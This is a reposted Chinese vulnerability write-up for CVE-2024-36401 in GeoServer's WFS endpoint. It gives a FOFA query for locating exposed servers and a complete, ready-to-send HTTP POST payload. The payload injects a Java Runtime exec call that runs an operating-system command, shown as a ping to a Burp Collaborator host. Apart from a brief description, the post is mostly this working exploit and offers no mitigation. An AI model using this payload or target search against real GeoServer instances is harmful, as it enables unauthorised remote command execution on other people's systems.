GeoServer /geoserver/wfs接口存在远程命令执行漏洞 附POC

admin 2024年7月10日18:40:03评论19 views字数 1029阅读3分25秒阅读模式

1. GeoServer /geoserver/wfs接口简介

微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发

GeoServer 是一个开源的地理空间服务器

2.漏洞描述

GeoServer是OGC Web服务器规范的J2EE实现,利用GeoServer可以方便地发布地图数据,允许用户对要素数据进行更新、删除、插入操作,通过GeoServer可以比较容易地在用户之间迅速共享空间地理信息。GeoServer /geoserver/wfs接口存在远程命令执行漏洞

CVE编号:CVE-2024-36401

CNNVD编号:

CNVD编号:

3.影响版本

GeoServer

GeoServer /geoserver/wfs接口存在远程命令执行漏洞 附POC
GeoServer /geoserver/wfs接口存在远程命令执行漏洞

4.fofa查询语句

app="GeoServer"

5.漏洞复现

漏洞链接:http://xxx.xxx.xx.xx/geoserver/wfs

漏洞数据包:

POST /geoserver/wfs HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent:Mozilla/5.0(X11;Linux x86_64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/87.0.4280.88Safari/537.36
Accept-Encoding: gzip, deflate
Accept:*/*
Connection: close
Content-Length: 362

<wfs:GetPropertyValue service='WFS' version='2.0.0'
xmlns:topp='http://www.openplans.org/topp'
xmlns:fes='http://www.opengis.net/fes/2.0'
xmlns:wfs='http://www.opengis.net/wfs/2.0'
valueReference='exec(java.lang.Runtime.getRuntime(),"ping 876268.okcfke24wzvpm2c1uyqdbfa3iuokc9.burpcollaborator.net")'>
<wfs:Query typeNames='topp:states'/>
</wfs:GetPropertyValue>

GeoServer /geoserver/wfs接口存在远程命令执行漏洞 附POC

原文始发于微信公众号(南风漏洞复现文库):GeoServer /geoserver/wfs接口存在远程命令执行漏洞 附POC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月10日18:40:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   GeoServer /geoserver/wfs接口存在远程命令执行漏洞 附POChttps://cn-sec.com/archives/2937453.html

发表评论

匿名网友 填写信息